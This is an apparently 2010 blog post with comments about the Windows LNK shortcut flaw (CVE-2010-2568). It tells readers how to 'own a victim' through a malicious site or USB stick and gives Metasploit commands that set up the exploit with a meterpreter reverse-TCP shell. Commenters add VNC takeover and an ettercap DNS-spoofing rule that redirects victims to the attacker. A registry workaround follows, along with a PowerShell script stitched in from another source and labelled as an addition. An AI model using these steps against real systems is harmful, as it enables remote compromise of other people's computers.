These days a new Windows 0day exploit has been detected.
With it an attacker can own a victim without the victim clicking on any file.
Put on a USB stick, it infects the victim as soon as the stick is connected to the PC.

This video shows how it works, and beneath the video I will show you how to protect against this vulnerability!

All you have to do is trick a victim into going to a malicious website, or put the LNK file and the DLL on a USB stick and wait until it is connected to a PC. Nothing more: Windows will do the rest for you!

First update Metasploit to the newest revision and set up your exploit:

use windows/browser/ms10_xxx_windows_shell_lnk_execute
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT <any port>

That's it!


Music by Silence – Réalité


Windows LNK vulnerability (CVE-2010-2568) in action from hardez on Vimeo.

Now I'll tell you how to protect yourself against this flaw:

  1. Open regedit (go to Start -> Run -> regedit).
  2. Navigate to HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler.
  3. Click File -> Export to save the current state, so you can import it again as soon as Microsoft patches this flaw.
  4. Delete the value.
  5. Reboot.

Now wait for a patch and then just double-click on your exported file.
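The same workaround as a script, so it can be rolled out and checked on more than one machine. This is an added example and not part of the original post; the backup file location and function names are my own assumptions. Run it from an elevated PowerShell prompt.

```powershell
# Added example (not from the original post): scripted version of the manual regedit
# workaround above. Exports the key first, removes the IconHandler default value,
# and can restore it from the export once the patch is installed. Run as Administrator.
# The backup path and the function names below are assumptions, not anything from the post.

$IconHandlerKey = 'HKCR\lnkfile\shellex\IconHandler'
$BackupFile     = Join-Path $env:USERPROFILE 'lnkfile-IconHandler-backup.reg'

function Backup-LnkIconHandler {
    # Step 3 of the post: export the current key so it can be imported again later.
    reg.exe export $IconHandlerKey $BackupFile /y | Out-Null
    if (-not (Test-Path $BackupFile)) { throw "Export failed, not touching the registry." }
    Write-Host "Exported $IconHandlerKey to $BackupFile"
}

function Disable-LnkIconHandler {
    # Step 4: /ve addresses the (Default) value of the key, which is what Explorer reads
    # to find the shortcut icon handler. Side effect: shortcuts show a generic icon.
    Backup-LnkIconHandler
    reg.exe delete $IconHandlerKey /ve /f | Out-Null
    Write-Host "IconHandler default value removed. Reboot (step 5) to apply."
}

function Test-LnkIconHandlerDisabled {
    # Check the workaround state: $true when the default value is absent or empty.
    $key = Get-Item -Path 'Registry::HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler' -ErrorAction SilentlyContinue
    if ($null -eq $key) { return $true }
    return [string]::IsNullOrEmpty($key.GetValue(''))
}

function Restore-LnkIconHandler {
    # The post's last step: after the patch is installed, import the saved .reg file.
    if (-not (Test-Path $BackupFile)) { throw "No backup at $BackupFile" }
    reg.exe import $BackupFile | Out-Null
    Write-Host "Restored $IconHandlerKey from $BackupFile"
}

# Usage:
#   Disable-LnkIconHandler          # before the patch
#   Test-LnkIconHandlerDisabled     # True while the workaround is in place
#   Restore-LnkIconHandler          # after installing the Microsoft patch
```

Microsoft's advisory for this flaw also listed stopping the WebClient service as a workaround, which closes the WebDAV delivery path that comes up in the comments below.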


12 Responses to “Windows LNK vulnerability (CVE-2010-2568) in action”

  1. [...] way but you can also put the files on a USB Stick and own your victim this way. Have a look at Windows LNK vulnerability (CVE-2010-2568) in action [...]

  2. osprey says:

    I can confirm that this method works on Windows XP. However I cannot get it to work with Windows 7.

  3. hardez says:

    Will try it tomorrow, but I’m pretty sure that I’ve read that all versions since 2000 are affected!

  4. andy says:

    Hey, great video, but how did you get the VNC server? I have been trying but can’t. Could you post the commands?

    Thanks heaps

  5. hardez says:

    You can get the VNC session by typing “run vnc” in a meterpreter session.

  6. zitstif says:

    You could force your clients (victims) to your Metasploit listener via ettercap. In the etter.dns file you could force all domain requests to the attacker’s server.

    (like
    *.* A 172.0.23.101
    )

  7. hardez says:

    Good idea. I also tried to integrate it in every site as an iframe, but then the exploit didn’t work. Don’t know why.
    Metasploit sends the exploit but didn’t finish it.

  8. mekanical says:

    This does not work on Windows 7 unless you actually click the link.

  9. Rakesh says:

    Can you just tell me how we could enable a remote PC and exploit through this vulnerability?

  10. Rakesh says:

    What will this LHOST and LPORT do?

  11. Rakesh says:

    Just explain what WEBDAV means, please!

  12. hardez says:

    @rakesh
    >Can you just tell me
    >how we could enable a remote PC and exploit through this vulnerability?
    That’s what you have to find out.

    >What will this LHOST and LPORT do?
    LHOST == local host (your local IP)
    LPORT == local port (a free port for the reverse meterpreter session)

    >Just explain what WEBDAV means, please!
    http://en.wikipedia.org/wiki/WebDav
